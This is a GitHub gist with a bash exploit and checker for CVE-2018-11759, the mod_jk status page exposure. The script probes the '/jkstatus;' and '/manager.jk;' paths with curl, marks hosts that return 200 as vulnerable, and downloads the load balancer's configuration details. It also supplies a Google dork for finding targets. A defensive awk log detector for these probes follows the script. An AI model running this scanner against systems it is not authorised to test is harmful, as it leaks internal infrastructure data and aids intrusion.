@Jul10l1r4
Last active December 23, 2018 03:54
This script is an exploit for applications vulnerable to CVE-2018-11759.
#!/usr/bin/env bash
# CVE 2018-11759
# Author: Julio Lira <jul10l1r4@ufrn.edu.br>
# Collaborator: Fernando Eloi <edxeloi@hotmail.com>
# date: 12/07/2018 | MM/DD/YYYY
# License: GNU GPL version 3
# Details: https://jul10l1r4.github.io/artigo/Vulnerabilidade-em-balanceadores-mod_jk-[CVE-2018-11759]/index.html
# Description: This script tests whether an application is vulnerable to CVE 2018-11759.
# Google Dork: ["JK Status Manager for"]
# Vendor Homepage: [http://tomcat.apache.org/]
# Exploit Link: [https://github.com/Jul10l1r4/Identificador-CVE-2018-11759]
# Version: [0.1]
# Tested on: [Slackware, Debian, Red Hat, Gentoo, Pentoo, *BSD; compatible with all Unix-like systems, including Mac OS and others]
# Dependencies: curl, which
# CVE : [CVE-2018-11759]

# Save all details of the load balancer.
# $1 is the status URL found by _req (it already ends in ";").
_save(){
    # Verify that curl exists on this machine; stop here if it does not
    if which curl > /dev/null; then
        printf '\n Dependence, curl found...\n'
    else
        printf '\n \033[31mInstall the curl!\033[0m\n'
        return 1
    fi
    # Download the details into the directory files_cap/,
    # in a file named after the host part of the URL
    local out
    out="files_cap/$(printf '%s' "$1" | cut -d "/" -f 3).data"
    mkdir -p files_cap
    echo -e '\033[32m Starting balancing details download\033[0m'
    curl --silent "$1?mime=prop" > "$out"
    # Show the OK message
    printf '\n \033[32mDetails have been saved in %s\033[0m\n' "$out"
}

# Send the requests and set $url and $response
_req(){
    # Reset the results so a previous URL cannot leak into this one
    url=""
    response=""
    # Get the HTTP status of each status path and check it
    jks=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/jkstatus;" 2>/dev/null)
    echo "Response: $jks no /jkstatus"
    mjk=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/manager.jk;" 2>/dev/null)
    echo "Response: $mjk no /manager.jk"
    if [ "$mjk" != 404 ]; then
        url="$1/manager.jk;"
        response=$mjk
    elif [ "$jks" != 404 ]; then
        url="$1/jkstatus;"
        response=$jks
    fi
}

while read -r -p "Paste the URL -> " LINE; do
    _req "$LINE"
    if [ "$response" = 200 ]; then
        printf '\n \033[31mVulnerable\033[0m\n See: %s\n' "$url"
        _save "$url"
    elif [ "$response" = 302 ] || [ "$response" = 401 ]; then
        printf '\n Safe, but may suffer brute\n force attack, caution\n See: %s\n' "$url"
    else
        printf '\n \033[32mSafe, Congrats!\033[0m\n'
    fi
done
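
The requests this script sends (`/jkstatus;` and `/manager.jk;`, then `?mime=prop` on a hit) are easy to spot in a web server access log. The following is an added example, not part of the gist: it flags those requests and grades them by status code the same way the script does. It assumes Apache combined log format; the function name `detect_jk_probes`, the verdict labels, and the sample log lines are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the gist): find access-log entries that request a
# mod_jk status path with ";" appended, as the checker above does.
# Assumption: Apache combined log format. The log lines below are constructed.

SAMPLE_LOG='192.0.2.10 - - [07/Dec/2018:10:00:01 +0000] "HEAD /jkstatus; HTTP/1.1" 200 - "-" "curl/7.61.0"
192.0.2.10 - - [07/Dec/2018:10:00:02 +0000] "HEAD /manager.jk; HTTP/1.1" 404 - "-" "curl/7.61.0"
192.0.2.10 - - [07/Dec/2018:10:00:03 +0000] "GET /jkstatus;?mime=prop HTTP/1.1" 200 5120 "-" "curl/7.61.0"
198.51.100.7 - - [07/Dec/2018:10:05:00 +0000] "GET /jkstatus HTTP/1.1" 403 199 "-" "Mozilla/5.0"
198.51.100.7 - - [07/Dec/2018:10:06:00 +0000] "GET /index.html;jsessionid=AB12 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Dec/2018:11:00:00 +0000] "HEAD /manager.jk; HTTP/1.1" 401 - "-" "curl/7.61.0"'

# Reads log lines on stdin; prints "client status verdict uri" per match.
detect_jk_probes() {
    awk -F'"' '
    {
        split($1, head, " ")     # head[1] = client address
        split($2, req, " ")      # req[1] = method, req[2] = URI
        split($3, tail, " ")     # tail[1] = status code
        uri = req[2]
        # Match on the path only, so the query string cannot hide or fake a hit.
        path = uri
        sub(/\?.*$/, "", path)
        # Only the two status endpoints, and only with ";" directly after them.
        if (path !~ /\/(jkstatus|manager\.jk);/) next
        status = tail[1]
        if (status == "200")
            verdict = "EXPOSED"          # status page served: access rule bypassed
        else if (status == "302" || status == "401")
            verdict = "AUTH_REQUIRED"    # reachable, but behind a login
        else
            verdict = "NOT_SERVED"       # probe seen, nothing returned
        print head[1], status, verdict, uri
    }'
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | detect_jk_probes
```

Any `EXPOSED` line means the status page was actually returned to that client, so the matching host should be patched or have the path blocked before the proxy hands it to mod_jk.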